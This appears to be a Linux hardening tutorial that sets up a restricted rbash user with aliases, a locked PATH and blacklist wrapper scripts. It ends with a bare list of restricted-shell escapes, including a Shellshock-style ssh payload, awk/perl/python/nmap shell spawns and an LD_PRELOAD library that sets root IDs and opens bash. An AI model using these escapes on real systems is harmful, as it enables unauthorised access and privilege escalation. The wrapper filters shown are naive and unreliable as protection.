Limiting local user rights in Linux to the minimum

• access restrictions via ssh, sftp network services (did not work)
• differentiation of access rights by the linux operating system itself (it didn’t fit, I would like a universal solution)
• use chroot (did not fit)
• the use of third-party utilities, such as SELinux (did not fit, complicates the system).

• there is no possibility of changing the directory with the cd command
• cannot reset or change the values ​​of the variables SHELL, PATH, ENV, BASH_ENV
• forbidden to specify commands containing / (slash)
• it is forbidden to import functions from the main shell
• It is forbidden to redirect output using the operators>, <, |, <>,> &, &>, >>
• It is forbidden to use the exec command to substitute the command, etc.

echo '/bin/bash -r' > /bin/zbash chmod +x /bin/zbash 

 adduser --home /home/zuser --shell /bin/zbash zuser 

 chown root.zuser /home/zuser chmod 750 /home/zuser 

 cd ~zuser ls -a rm .bash* rm .profile ls -a 

 echo "PATH=:/home/zuser/bin" > .bashrc echo "alias help='echo access is limited'" >> .bashrc # alias на команду help echo "bind 'set disable-completion on'" >> .bashrc # Отключает автодополнение на tab mkdir -p bin chmod 750 bin chown -R root.zuser /home/zuser chmod 640 .bash* 

 echo "alias echo=':'" >> .bashrc echo "alias cat=':'" >> .bashrc echo "alias bash=':'" >> .bashrc echo "alias sh=':'" >> .bashrc echo "alias ln=':'" >> .bashrc echo "alias set=':'" >> .bashrc echo "alias uset=':'" >> .bashrc echo "alias export=':'" >> .bashrc echo "alias typeset=':'" >> .bashrc echo "alias declare=':'" >> .bashrc echo "alias alias=':'" >> .bashrc echo "alias unalias=':'" >> .bashrc 

 root@host: su zuser zuser@host: help access is limited zuser@host: pwd /home/zuser zuser@host: ls /tmp/ bash: ls: команда не найдена zuser@host: /bin/ls bash: /bin/ls: ограниченный режим в команде нельзя использовать косую черту {/} zuser@host: echo $PATH :/home/zuser/bin zuser@host: PATH=/bin/ bash: PATH: переменная только для чтения zuser@host: exit 

 ln -s /bin/ping /home/zuser/bin/ping 

 mkdir /var/scripts echo "/usr/sbin/useradd -D" > /var/scripts/user-info chmod +x /var/scripts/user-info ln -s /var/scripts/user-info /home/zuser/bin/user-info 

 nano /var/scripts/ls 

 blacklist="\? ../ /etc /bin /boot /var" for var in $blacklist do if [[ $* == *$var* ]]; then echo 'Access is denied:' $* exit fi done /bin/ls $* 

 chmod +x /var/scripts/ls ln -s /var/scripts/ls /home/zuser/bin/ls 

 nano /var/scripts/cat 

 whitelist="./ /tmp/" # белый список for var in $whitelist do if [[ $* == *$var* ]]; then /bin/cat $* # запуск утилиты cat с заданными параметрами exit fi done echo 'Access is denied:' $* 

 chmod +x /var/scripts/cat ln -s /var/scripts/cat /home/zuser/bin/cat 

• we created user zuser with rbash shell
• disabled the ability to use autocompletion in the console
• zuser can only run utilities from the / home / zuser / bin directory
• added ping command to zuser
• added own user-info command to user zuser
• the zuser user has been limited to running the ls and cat commands through the wrapper

 ssh zuser@xxxx -t "/bin/bash" 

 ssh zuser@xxxx -t "bash --noprofile" 

 ssh zuser@xxxx -t "() { :; }; /bin/bash" 

 :!bash 

 :set shell=/bin/bash :shell 

 !bash 

 find . -maxdepth 0 -execdir /bin/bash \; 

 awk 'BEGIN {system("/bin/bash")}' 

 nmap --interactive 

 echo "os.execute('/bin/sh')" > exploit.nse nmap --script=exploit.nse 

 perl -e 'exec "/bin/bash";' 

 python -c 'import pty; pty.spawn("/bin/bash")' 

 ruby: exec "/bin/bash" 

 #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("echo work"); system("/bin/bash --noprofile"); } 

 gcc -fPIC -shared -o evil.so evil.c -nostartfiles 

 LD_PRELOAD=$PWD/evil.so ls